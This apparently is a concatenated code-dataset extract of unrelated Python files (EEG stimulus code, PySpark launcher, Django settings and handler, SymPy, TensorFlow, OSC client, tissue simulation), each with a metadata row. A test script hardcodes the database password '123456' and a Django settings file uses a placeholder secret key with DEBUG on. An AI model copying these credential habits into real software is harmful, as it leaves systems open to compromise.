stim_freq = np.random.binomial(1, 0.5, n_trials)
itis = iti + np.random.rand(n_trials) * jitter
trials = DataFrame(dict(stim_freq=stim_freq, timestamp=np.zeros(n_trials)))
trials["iti"] = itis
trials["soa"] = soa
# Setup graphics
mywin = visual.Window(
[1920, 1080], monitor="testMonitor", units="deg", fullscr=True
)
fixation = visual.GratingStim(win=mywin, size=0.2, pos=[0, 0], sf=0, rgb=[1, 0, 0])
fixation.setAutoDraw(True)
mywin.flip()
# Show the instructions screen
show_instructions(10)
# Start EEG Stream, wait for signal to settle, and then pull timestamp for start point
if eeg:
eeg.start(save_fn, duration=record_duration)
start = time()
# Iterate through the events
for ii, trial in trials.iterrows():
# Intertrial interval
core.wait(trial["iti"] + np.random.randn() * jitter)
# Select stimulus frequency
ind = trials["stim_freq"].iloc[ii]
auds[ind].stop()
auds[ind].play()
# Push sample
if eeg:
timestamp = time()
if eeg.backend == "muselsl":
marker = [markernames[ind]]
marker = list(map(int, marker))
else:
marker = markernames[ind]
eeg.push_sample(marker=marker, timestamp=timestamp)
mywin.flip()
# Offset
core.wait(soa)
if len(event.getKeys()) > 0:
break
if (time() - start) > record_duration:
break
event.clearEvents()
# Cleanup
if eeg:
eeg.stop()
mywin.close()
def show_instructions(duration):
instruction_text = """
Welcome to the aMMN experiment!
Stay still, focus on the centre of the screen, and try not to blink.
This block will run for %s seconds.
Press spacebar to continue.
"""
instruction_text = instruction_text % duration
# graphics
mywin = visual.Window([1600, 900], monitor="testMonitor", units="deg", fullscr=True)
mywin.mouseVisible = False
# Instructions
text = visual.TextStim(win=mywin, text=instruction_text, color=[-1, -1, -1])
text.draw()
mywin.flip()
event.waitKeys(keyList="space")
mywin.mouseVisible = True
mywin.close()
def generate_am_waveform(
carrier_freq,
am_freq,
secs=1,
sample_rate=None,
am_type="gaussian",
gaussian_std_ratio=8,
):
"""Generate an amplitude-modulated waveform.
Generate a sine wave amplitude-modulated by a second sine wave or a
Gaussian envelope with standard deviation = period_AM/8.
Args:
carrier_freq (float): carrier wave frequency, in Hz
am_freq (float): amplitude modulation frequency, in Hz
Keyword Args:
secs (float): duration of the stimulus, in seconds
sample_rate (float): sampling rate of the sound, in Hz
am_type (str): amplitude-modulation type
'gaussian' -> Gaussian with std defined by `gaussian_std`
'sine' -> sine wave
gaussian_std_ratio (float): only used if `am_type` is 'gaussian'.
Ratio between AM period and std of the Gaussian envelope. E.g.,
gaussian_std = 8 means the Gaussian window has 8 standard
deviations around its mean inside one AM period.
Returns:
(numpy.ndarray): sound samples
"""
t = np.arange(0, secs, 1.0 / sample_rate)
if am_type == "gaussian":
period = int(sample_rate / am_freq)
std = period / gaussian_std_ratio
norm_window = stats.norm.pdf(np.arange(period), period / 2, std)
norm_window /= np.max(norm_window)
n_windows = int(np.ceil(secs * am_freq))
am = np.tile(norm_window, n_windows)
am = am[: len(t)]
elif am_type == "sine":
am = np.sin(2 * np.pi * am_freq * t)
carrier = 0.5 * np.sin(2 * np.pi * carrier_freq * t) + 0.5
am_out = carrier * am
return am_out
| eegnb/experiments/auditory_ssaep/ssaep.py | 5,781 | Generate an amplitude-modulated waveform.
Generate a sine wave amplitude-modulated by a second sine wave or a
Gaussian envelope with standard deviation = period_AM/8.
Args:
carrier_freq (float): carrier wave frequency, in Hz
am_freq (float): amplitude modulation frequency, in Hz
Keyword Args:
secs (float): duration of the stimulus, in seconds
sample_rate (float): sampling rate of the sound, in Hz
am_type (str): amplitude-modulation type
'gaussian' -> Gaussian with std defined by `gaussian_std`
'sine' -> sine wave
gaussian_std_ratio (float): only used if `am_type` is 'gaussian'.
Ratio between AM period and std of the Gaussian envelope. E.g.,
gaussian_std = 8 means the Gaussian window has 8 standard
deviations around its mean inside one AM period.
Returns:
(numpy.ndarray): sound samples
Auditory SSAEP Experiment
===========================
Parameters:
-----------
duration - duration of the recording in seconds (default 10)
n_trials - number of trials (default 10)
iti - intertrial interval (default 0.3)
soa - stimulus onset asynchrony, = interval between end of stimulus
and next trial (default 0.2)
jitter - jitter in the intertrial intervals (default 0.2)
secs - duration of the sound in seconds (default 0.2)
volume - volume of the sounds in [0,1] (default 0.8)
random_state - random seed (default 42)
Generate Steady-State Auditory Evoked Potential (SSAEP)
=======================================================
Steady-State Auditory Evoked Potential (SSAEP) - also known as Auditory
Steady-State Response (ASSR) - stimulus presentation.
Set up trial parameters Initialize stimuli Set up trial list Setup graphics Show the instructions screen Start EEG Stream, wait for signal to settle, and then pull timestamp for start point Iterate through the events Intertrial interval Select stimulus frequency Push sample Offset Cleanup graphics Instructions | 1,958 | en | 0.712026 |
import os
import sys
import argparse
from importlib import import_module
from pyspark.sql import SparkSession
spark = SparkSession.builder.getOrCreate()
# Load configuration
parser = argparse.ArgumentParser()
parser.add_argument("job", type=str, nargs='?', default="Job1.MyMethod")
parser.add_argument("slot", type=str, nargs='?', default="2018/11/19")
args = parser.parse_args()
job_module, job_method = args.job.rsplit('.',1)
slot = args.slot
if "local" in spark.sparkContext.master:
dirname = os.path.dirname(__file__)
sys.path.insert(0, (os.path.join(dirname, 'Utils')))
sys.path.insert(0, (os.path.join(dirname, 'Jobs')))
spark.conf.set("ADLS",os.path.join(dirname, 'DataLake'))
else:
spark.sparkContext.addPyFile("dbfs:/MyApplication/Code/scripts.zip")
spark.conf.set("ADLS",'adl://myazuredatalake.azuredatalakestore.net/')
spark.conf.set("dfs.adls.oauth2.access.token.provider.type", "ClientCredential")
spark.conf.set("dfs.adls.oauth2.client.id", dbutils.secrets.get(scope = "SparkADLS - Secrets", key = "clientid"))
spark.conf.set("dfs.adls.oauth2.credential", dbutils.secrets.get(scope = "SparkADLS - Secrets", key = "credential"))
spark.conf.set("dfs.adls.oauth2.refresh.url", "https://login.microsoftonline.com/[tenantid]/oauth2/token")
# Execute Job
mod = import_module(job_module)
met = getattr(mod, job_method)
met(slot) | main.py | 1,382 | Load configuration Execute Job | 30 | en | 0.665473 |
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
SECRET_KEY = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
DEBUG = True
USE_TZ = False
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
]
MIDDLEWARE = [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
]
# ROOT_URLCONF = "tests.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
STATIC_URL = "/static/"
| tests/settings.py | 1,316 | ROOT_URLCONF = "tests.urls" | 27 | en | 0.485173 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by TaoYuan on 2018/2/28 0028.
# @Link : http://blog.csdn.net/lftaoyuan
# Github : https://github.com/seeways
import asyncio
import orm
from models import User, Blog, Comment
@asyncio.coroutine
def test(loop):
yield from orm.create_pool(loop=loop, user='root', password='123456', database='awesome')
# taoyuan 123456
u = User(name='TaoYuan', email='taoyuan', passwd='396d447288c288f0ff7ba1fc608600d7e233646d', image='about:blank')
yield from u.save()
loop = asyncio.get_event_loop()
loop.run_until_complete(test(loop))
loop.close()
| www/test_sql.py | 615 | !/usr/bin/env python -*- coding: utf-8 -*- Created by TaoYuan on 2018/2/28 0028. @Link : http://blog.csdn.net/lftaoyuan Github : https://github.com/seeways taoyuan 123456 | 178 | en | 0.448002 |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from django.dispatch import receiver
from gcloud.iam_auth.tasks import register_grant_resource_creator_task
from gcloud.core.signals import user_enter
@receiver(user_enter)
def user_enter_handler(username, **kwargs):
register_grant_resource_creator_task.delay(username=username)
| gcloud/iam_auth/signals/handlers.py | 1,036 | Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
-*- coding: utf-8 -*- | 723 | en | 0.864501 |
from __future__ import unicode_literals
import sys
import types
from django import http
from django.core import signals
from django.utils.encoding import force_text
from django.utils.importlib import import_module
from django.utils.log import getLogger
from django.utils import six
logger = getLogger('django.request')
class BaseHandler(object):
# Changes that are always applied to a response (in this order).
response_fixes = [
http.fix_location_header,
http.conditional_content_removal,
http.fix_IE_for_attach,
http.fix_IE_for_vary,
]
def __init__(self):
self._request_middleware = self._view_middleware = self._template_response_middleware = self._response_middleware = self._exception_middleware = None
def load_middleware(self):
"""
Populate middleware lists from settings.MIDDLEWARE_CLASSES.
Must be called after the environment is fixed (see __call__ in subclasses).
"""
from django.conf import settings
from django.core import exceptions
self._view_middleware = []
self._template_response_middleware = []
self._response_middleware = []
self._exception_middleware = []
request_middleware = []
for middleware_path in settings.MIDDLEWARE_CLASSES:
try:
mw_module, mw_classname = middleware_path.rsplit('.', 1)
except ValueError:
raise exceptions.ImproperlyConfigured('%s isn\'t a middleware module' % middleware_path)
try:
mod = import_module(mw_module)
except ImportError as e:
raise exceptions.ImproperlyConfigured('Error importing middleware %s: "%s"' % (mw_module, e))
try:
mw_class = getattr(mod, mw_classname)
except AttributeError:
raise exceptions.ImproperlyConfigured('Middleware module "%s" does not define a "%s" class' % (mw_module, mw_classname))
try:
mw_instance = mw_class()
except exceptions.MiddlewareNotUsed:
continue
if hasattr(mw_instance, 'process_request'):
request_middleware.append(mw_instance.process_request)
if hasattr(mw_instance, 'process_view'):
self._view_middleware.append(mw_instance.process_view)
if hasattr(mw_instance, 'process_template_response'):
self._template_response_middleware.insert(0, mw_instance.process_template_response)
if hasattr(mw_instance, 'process_response'):
self._response_middleware.insert(0, mw_instance.process_response)
if hasattr(mw_instance, 'process_exception'):
self._exception_middleware.insert(0, mw_instance.process_exception)
# We only assign to this when initialization is complete as it is used
# as a flag for initialization being complete.
self._request_middleware = request_middleware
def get_response(self, request):
"Returns an HttpResponse object for the given HttpRequest"
from django.core import exceptions, urlresolvers
from django.conf import settings
try:
# Setup default url resolver for this thread, this code is outside
# the try/except so we don't get a spurious "unbound local
# variable" exception in the event an exception is raised before
# resolver is set
urlconf = settings.ROOT_URLCONF
urlresolvers.set_urlconf(urlconf)
resolver = urlresolvers.RegexURLResolver(r'^/', urlconf)
try:
response = None
# Apply request middleware
for middleware_method in self._request_middleware:
response = middleware_method(request)
if response:
break
if response is None:
if hasattr(request, "urlconf"):
# Reset url resolver with a custom urlconf.
urlconf = request.urlconf
urlresolvers.set_urlconf(urlconf)
resolver = urlresolvers.RegexURLResolver(r'^/', urlconf)
callback, callback_args, callback_kwargs = resolver.resolve(
request.path_info)
# Apply view middleware
for middleware_method in self._view_middleware:
response = middleware_method(request, callback, callback_args, callback_kwargs)
if response:
break
if response is None:
try:
response = callback(request, *callback_args, **callback_kwargs)
except Exception as e:
# If the view raised an exception, run it through exception
# middleware, and if the exception middleware returns a
# response, use that. Otherwise, reraise the exception.
for middleware_method in self._exception_middleware:
response = middleware_method(request, e)
if response:
break
if response is None:
raise
# Complain if the view returned None (a common error).
if response is None:
if isinstance(callback, types.FunctionType): # FBV
view_name = callback.__name__
else: # CBV
view_name = callback.__class__.__name__ + '.__call__'
raise ValueError("The view %s.%s didn't return an HttpResponse object." % (callback.__module__, view_name))
# If the response supports deferred rendering, apply template
# response middleware and the render the response
if hasattr(response, 'render') and callable(response.render):
for middleware_method in self._template_response_middleware:
response = middleware_method(request, response)
response = response.render()
except http.Http404 as e:
logger.warning('Not Found: %s', request.path,
extra={
'status_code': 404,
'request': request
})
if settings.DEBUG:
from django.views import debug
response = debug.technical_404_response(request, e)
else:
try:
callback, param_dict = resolver.resolve404()
response = callback(request, **param_dict)
except:
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
except exceptions.PermissionDenied:
logger.warning(
'Forbidden (Permission denied): %s', request.path,
extra={
'status_code': 403,
'request': request
})
try:
callback, param_dict = resolver.resolve403()
response = callback(request, **param_dict)
except:
signals.got_request_exception.send(
sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request,
resolver, sys.exc_info())
except SystemExit:
# Allow sys.exit() to actually exit. See tickets #1023 and #4701
raise
except: # Handle everything else, including SuspiciousOperation, etc.
# Get the exception info now, in case another exception is thrown later.
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
finally:
# Reset URLconf for this thread on the way out for complete
# isolation of request.urlconf
urlresolvers.set_urlconf(None)
try:
# Apply response middleware, regardless of the response
for middleware_method in self._response_middleware:
response = middleware_method(request, response)
response = self.apply_response_fixes(request, response)
except: # Any exception should be gathered and handled
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
return response
def handle_uncaught_exception(self, request, resolver, exc_info):
"""
Processing for any otherwise uncaught exceptions (those that will
generate HTTP 500 responses). Can be overridden by subclasses who want
customised 500 handling.
Be *very* careful when overriding this because the error could be
caused by anything, so assuming something like the database is always
available would be an error.
"""
from django.conf import settings
if settings.DEBUG_PROPAGATE_EXCEPTIONS:
raise
logger.error('Internal Server Error: %s', request.path,
exc_info=exc_info,
extra={
'status_code': 500,
'request': request
}
)
if settings.DEBUG:
from django.views import debug
return debug.technical_500_response(request, *exc_info)
# If Http500 handler is not installed, re-raise last exception
if resolver.urlconf_module is None:
six.reraise(*exc_info)
# Return an HttpResponse that displays a friendly error message.
callback, param_dict = resolver.resolve500()
return callback(request, **param_dict)
def apply_response_fixes(self, request, response):
"""
Applies each of the functions in self.response_fixes to the request and
response, modifying the response in the process. Returns the new
response.
"""
for func in self.response_fixes:
response = func(request, response)
return response
def get_script_name(environ):
"""
Returns the equivalent of the HTTP request's SCRIPT_NAME environment
variable. If Apache mod_rewrite has been used, returns what would have been
the script name prior to any rewriting (so it's the script name as seen
from the client's perspective), unless the FORCE_SCRIPT_NAME setting is
set (to anything).
"""
from django.conf import settings
if settings.FORCE_SCRIPT_NAME is not None:
return force_text(settings.FORCE_SCRIPT_NAME)
# If Apache's mod_rewrite had a whack at the URL, Apache set either
# SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any
# rewrites. Unfortunately not every Web server (lighttpd!) passes this
# information through all the time, so FORCE_SCRIPT_NAME, above, is still
# needed.
script_url = environ.get('SCRIPT_URL', '')
if not script_url:
script_url = environ.get('REDIRECT_URL', '')
if script_url:
return force_text(script_url[:-len(environ.get('PATH_INFO', ''))])
return force_text(environ.get('SCRIPT_NAME', ''))
| django/core/handlers/base.py | 11,855 | Applies each of the functions in self.response_fixes to the request and
response, modifying the response in the process. Returns the new
response.
Returns an HttpResponse object for the given HttpRequest
Returns the equivalent of the HTTP request's SCRIPT_NAME environment
variable. If Apache mod_rewrite has been used, returns what would have been
the script name prior to any rewriting (so it's the script name as seen
from the client's perspective), unless the FORCE_SCRIPT_NAME setting is
set (to anything).
Processing for any otherwise uncaught exceptions (those that will
generate HTTP 500 responses). Can be overridden by subclasses who want
customised 500 handling.
Be *very* careful when overriding this because the error could be
caused by anything, so assuming something like the database is always
available would be an error.
Populate middleware lists from settings.MIDDLEWARE_CLASSES.
Must be called after the environment is fixed (see __call__ in subclasses).
Changes that are always applied to a response (in this order). We only assign to this when initialization is complete as it is used as a flag for initialization being complete. Setup default url resolver for this thread, this code is outside the try/except so we don't get a spurious "unbound local variable" exception in the event an exception is raised before resolver is set Apply request middleware Reset url resolver with a custom urlconf. Apply view middleware If the view raised an exception, run it through exception middleware, and if the exception middleware returns a response, use that. Otherwise, reraise the exception. Complain if the view returned None (a common error). FBV CBV If the response supports deferred rendering, apply template response middleware and the render the response Allow sys.exit() to actually exit. See tickets 1023 and 4701 Handle everything else, including SuspiciousOperation, etc. Get the exception info now, in case another exception is thrown later. Reset URLconf for this thread on the way out for complete isolation of request.urlconf Apply response middleware, regardless of the response Any exception should be gathered and handled If Http500 handler is not installed, re-raise last exception Return an HttpResponse that displays a friendly error message. If Apache's mod_rewrite had a whack at the URL, Apache set either SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any rewrites. Unfortunately not every Web server (lighttpd!) passes this information through all the time, so FORCE_SCRIPT_NAME, above, is still needed. | 2,569 | en | 0.872317 |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Models package definition."""
from official.nlp.modeling.models.bert_classifier import BertClassifier
from official.nlp.modeling.models.bert_pretrainer import BertPretrainer
from official.nlp.modeling.models.bert_span_labeler import BertSpanLabeler
from official.nlp.modeling.models.bert_token_classifier import BertTokenClassifier
| official/nlp/modeling/models/__init__.py | 1,024 | Models package definition.
Copyright 2020 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================== | 689 | en | 0.830814 |
"""Tools for constructing domains for expressions. """
from sympy.polys.polyutils import parallel_dict_from_basic
from sympy.polys.polyoptions import build_options
from sympy.polys.domains import ZZ, QQ, RR, EX
from sympy.assumptions import ask, Q
from sympy.core import S, sympify
from sympy.utilities import any
def _construct_simple(coeffs, opt):
"""Handle simple domains, e.g.: ZZ, QQ, RR and algebraic domains. """
result, rationals, reals, algebraics = {}, False, False, False
if opt.extension is True:
is_algebraic = lambda coeff: ask(Q.algebraic(coeff))
else:
is_algebraic = lambda coeff: False
# XXX: add support for a + b*I coefficients
for coeff in coeffs:
if coeff.is_Rational:
if not coeff.is_Integer:
rationals = True
elif coeff.is_Float:
if not algebraics:
reals = True
else:
# there are both reals and algebraics -> EX
return False
elif is_algebraic(coeff):
if not reals:
algebraics = True
else:
# there are both algebraics and reals -> EX
return False
else:
# this is a composite domain, e.g. ZZ[X], EX
return None
if algebraics:
domain, result = _construct_algebraic(coeffs, opt)
else:
if reals:
domain = RR
else:
if opt.field or rationals:
domain = QQ
else:
domain = ZZ
result = []
for coeff in coeffs:
result.append(domain.from_sympy(coeff))
return domain, result
def _construct_algebraic(coeffs, opt):
"""We know that coefficients are algebraic so construct the extension. """
from sympy.polys.numberfields import primitive_element
result, exts = [], set([])
for coeff in coeffs:
if coeff.is_Rational:
coeff = (None, 0, QQ.from_sympy(coeff))
else:
a = coeff.as_coeff_add()[0]
coeff -= a
b = coeff.as_coeff_mul()[0]
coeff /= b
exts.add(coeff)
a = QQ.from_sympy(a)
b = QQ.from_sympy(b)
coeff = (coeff, b, a)
result.append(coeff)
exts = list(exts)
g, span, H = primitive_element(exts, ex=True, polys=True)
root = sum([ s*ext for s, ext in zip(span, exts) ])
domain, g = QQ.algebraic_field((g, root)), g.rep.rep
for i, (coeff, a, b) in enumerate(result):
if coeff is not None:
coeff = a*domain.dtype.from_list(H[exts.index(coeff)], g, QQ) + b
else:
coeff = domain.dtype.from_list([b], g, QQ)
result[i] = coeff
return domain, result
def _construct_composite(coeffs, opt):
"""Handle composite domains, e.g.: ZZ[X], QQ[X], ZZ(X), QQ(X). """
numers, denoms = [], []
for coeff in coeffs:
numer, denom = coeff.as_numer_denom()
numers.append(numer)
denoms.append(denom)
polys, gens = parallel_dict_from_basic(numers + denoms) # XXX: sorting
if any(gen.is_number for gen in gens):
return None # generators are number-like so lets better use EX
n = len(gens)
k = len(polys)//2
numers = polys[:k]
denoms = polys[k:]
if opt.field:
fractions = True
else:
fractions, zeros = False, (0,)*n
for denom in denoms:
if len(denom) > 1 or zeros not in denom:
fractions = True
break
coeffs = set([])
if not fractions:
for numer, denom in zip(numers, denoms):
denom = denom[zeros]
for monom, coeff in numer.iteritems():
coeff /= denom
coeffs.add(coeff)
numer[monom] = coeff
else:
for numer, denom in zip(numers, denoms):
coeffs.update(numer.values())
coeffs.update(denom.values())
rationals, reals = False, False
for coeff in coeffs:
if coeff.is_Rational:
if not coeff.is_Integer:
rationals = True
elif coeff.is_Float:
reals = True
break
if reals:
ground = RR
elif rationals:
ground = QQ
else:
ground = ZZ
result = []
if not fractions:
domain = ground.poly_ring(*gens)
for numer in numers:
for monom, coeff in numer.iteritems():
numer[monom] = ground.from_sympy(coeff)
result.append(domain(numer))
else:
domain = ground.frac_field(*gens)
for numer, denom in zip(numers, denoms):
for monom, coeff in numer.iteritems():
numer[monom] = ground.from_sympy(coeff)
for monom, coeff in denom.iteritems():
denom[monom] = ground.from_sympy(coeff)
result.append(domain((numer, denom)))
return domain, result
def _construct_expression(coeffs, opt):
"""The last resort case, i.e. use the expression domain. """
domain, result = EX, []
for coeff in coeffs:
result.append(domain.from_sympy(coeff))
return domain, result
def construct_domain(obj, **args):
"""Construct a minimal domain for the list of coefficients. """
opt = build_options(args)
if hasattr(obj, '__iter__'):
if isinstance(obj, dict):
monoms, coeffs = zip(*obj.items())
else:
coeffs = obj
else:
coeffs = [obj]
coeffs = map(sympify, coeffs)
result = _construct_simple(coeffs, opt)
if result is not None:
if result is not False:
domain, coeffs = result
else:
domain, coeffs = _construct_expression(coeffs, opt)
else:
if opt.composite:
result = _construct_composite(coeffs, opt)
else:
result = None
if result is not None:
domain, coeffs = result
else:
domain, coeffs = _construct_expression(coeffs, opt)
if hasattr(obj, '__iter__'):
if isinstance(obj, dict):
return domain, dict(zip(monoms, coeffs))
else:
return domain, coeffs
else:
return domain, coeffs[0]
| sympy/polys/constructor.py | 6,290 | We know that coefficients are algebraic so construct the extension.
Handle composite domains, e.g.: ZZ[X], QQ[X], ZZ(X), QQ(X).
The last resort case, i.e. use the expression domain.
Handle simple domains, e.g.: ZZ, QQ, RR and algebraic domains.
Construct a minimal domain for the list of coefficients.
Tools for constructing domains for expressions.
XXX: add support for a + b*I coefficients there are both reals and algebraics -> EX there are both algebraics and reals -> EX this is a composite domain, e.g. ZZ[X], EX XXX: sorting generators are number-like so lets better use EX | 588 | en | 0.781877 |
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from x2paddle.optimizer.pass_ import Pass
from x2paddle.optimizer.fusion.dygraph import TraceFcFuser
from x2paddle.optimizer.pass_manager import pass_register
@pass_register
class TraceFcFusePass(Pass):
name = "trace_fc_fuse_pass"
def __init__(self):
Pass.__init__(self)
def apply(self, graph):
fuser = TraceFcFuser()
fuser.operate(graph, match_kind="topo")
# 用于注册
trace_fc_fuse_pass = TraceFcFusePass() | x2paddle/optimizer/fusion/dygraph/trace_fc_fuse_pass.py | 1,065 | Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License" you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 用于注册 | 587 | en | 0.860162 |
""" Plays back tiny performances by sending OSC messages to Pure Data """
import struct
import socket
import random
from threading import Timer
DEFAULT_OSC_ADDRESS = "localhost"
DEFAULT_OSC_PORT = 5000
class TouchScreenOscClient(object):
"""A simple OSC client for sending messages recording touch screen performances."""
def __init__(self):
# just set up the socket.
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.setblocking(0)
def send_osc_message(self, osc_datagram, address, port):
"""Send OSC message via UDP."""
self.sock.sendto(osc_datagram, (address, port))
def pad_dgram_four_bytes(self, dgram):
"""Pad a datagram up to a multiple of 4 bytes."""
return (dgram + (b'\x00' * (4 - len(dgram) % 4)))
def setSynth(self, instrument="strings", address=DEFAULT_OSC_ADDRESS, port=DEFAULT_OSC_PORT):
"""Sends an OSC message to set the synth instrument."""
dgram = b''
dgram += self.pad_dgram_four_bytes("/inst".encode('utf-8'))
dgram += self.pad_dgram_four_bytes(",s")
dgram += self.pad_dgram_four_bytes(instrument.encode('utf-8'))
self.send_osc_message(dgram, address, port)
def setSynthRandom(self):
"""Choose a random synth for performance playback"""
self.setSynth(random.choice(["chirp", "keys", "drums", "strings"]))
def sendTouch(self, x, y, z, address=DEFAULT_OSC_ADDRESS, port=DEFAULT_OSC_PORT):
"""Sends an OSC message to trigger a touch sound."""
dgram = b''
dgram += self.pad_dgram_four_bytes("/touch".encode('utf-8'))
dgram += self.pad_dgram_four_bytes(",sfsfsf")
dgram += self.pad_dgram_four_bytes("/x".encode('utf-8'))
dgram += struct.pack('>f', x)
dgram += self.pad_dgram_four_bytes("/y".encode('utf-8'))
dgram += struct.pack('>f', y)
dgram += self.pad_dgram_four_bytes("/z".encode('utf-8'))
dgram += struct.pack('>f', z)
self.send_osc_message(dgram, address, port)
def playPerformance(self, perf_df):
"""Schedule performance of a tiny performance dataframe."""
# Dataframe must have abolute time (in seconds) as index, and 'x', 'y', and 'z' as column names.
for row in perf_df.iterrows():
Timer(row[0], self.sendTouch, args=[row[1].x, row[1].y, row[1].z]).start() # used with time in column
| robojam/tiny_performance_player.py | 2,419 | A simple OSC client for sending messages recording touch screen performances.
Pad a datagram up to a multiple of 4 bytes.
Schedule performance of a tiny performance dataframe.
Sends an OSC message to trigger a touch sound.
Send OSC message via UDP.
Sends an OSC message to set the synth instrument.
Choose a random synth for performance playback
Plays back tiny performances by sending OSC messages to Pure Data
just set up the socket. Dataframe must have abolute time (in seconds) as index, and 'x', 'y', and 'z' as column names. used with time in column | 558 | en | 0.792766 |
import networkx as nx
import numpy as np
import itertools
from scipy.spatial import distance
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import csv
import pdb
import globals as const
from funcs_orig import *
from math import isclose
from pyqt_viz import edge_viewer
import time
# Constants for simulation
dt = const.dt
#var_dt = True
# dimensions of the cell
l_apical = const.l_apical
l_depth = const.l_depth
# Set the arcs list
inner_arc = const.inner_arc
outer_arc = const.outer_arc
# mechanical parameters
# rest lengths of the passively elastic apical, basal and cell walls
l0_apical = l_apical
l0_basal = l_apical
l0_wall = l_depth
mu_apical = const.mu_apical
mu_basal = const.mu_basal
mu_wall = const.mu_wall
myo_beta = const.myo_beta
eta = const.eta
press_alpha = const.press_alpha
l_mvmt = const.l_mvmt
# initialize the tissue
G, K, centers, num_api_nodes, circum_sorted, belt, triangles = tissue_3d()
pit_centers = const.pit_centers
# Starting from t=0
t = 0
num_inter = 0
blacklist = []
contract = [True for counter in range(0,num_inter)]
#inter_edges = [[301,302],[295,296],[292,293],[298,299],[45,46],[39,40],[272,273],[174,175],[180,181],[276,277],[183,184],[177,178],[112,113],[286,287],[289,290],[115,116],[109,110],[283,284],[280,281],[106,107]]
# Starting from t=? after intercalations occur
#t = 1640
#num_inter = 20
#blacklist = [[301,302],[295,296],[292,293],[298,299],[45,46],[39,40],[272,273],[174,175],[180,181],[276,277],[183,184],[177,178],[112,113],[286,287],[289,290],[115,116],[109,110],[283,284],[280,281],[106,107]]
#contract = [False for counter in range(0,num_inter)]
#G = nx.read_gpickle('/home/cdurney/3d-vertex/concentric/t1640.pickle')
#
#for counter in range(0,num_inter):
# node = blacklist[counter][0]
# neighbor = blacklist[counter][1]
# print(node, neighbor)
# cents = list(set(K.neighbors(node)) & set(K.neighbors(neighbor)))
# ii = list((set(list(K.neighbors(node))) & set(list(centers))) - (set(list(K.neighbors(node))) & set(list(K.neighbors(neighbor)))))[0]
# jj = list((set(list(K.neighbors(neighbor))) & set(list(centers))) - (set(list(K.neighbors(node))) & set(list(K.neighbors(neighbor)))))[0]
# temp1 = list(set(K.neighbors(node)) & set(K.neighbors(cents[0])))
# temp1.remove(neighbor)
